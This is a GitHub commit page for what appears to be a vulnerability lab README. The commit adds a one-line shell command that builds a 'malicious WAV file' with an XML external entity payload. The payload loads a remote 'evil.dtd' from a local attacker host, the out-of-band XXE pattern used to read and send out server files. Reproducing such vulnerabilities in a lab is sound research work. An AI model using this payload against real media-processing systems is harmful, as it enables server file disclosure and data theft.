Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
motikan2010 authored Oct 4, 2021
1 parent b58f5ae commit 35ec4c8
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,14 @@ $ make up-mal

### Step3. Generate malicious WAV file

#### Without wavefile npm (Recommend)

```
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav
```

#### With wavefile npm

```
$ make make-wav
```
Expand Down

0 comments on commit 35ec4c8

Please sign in to comment.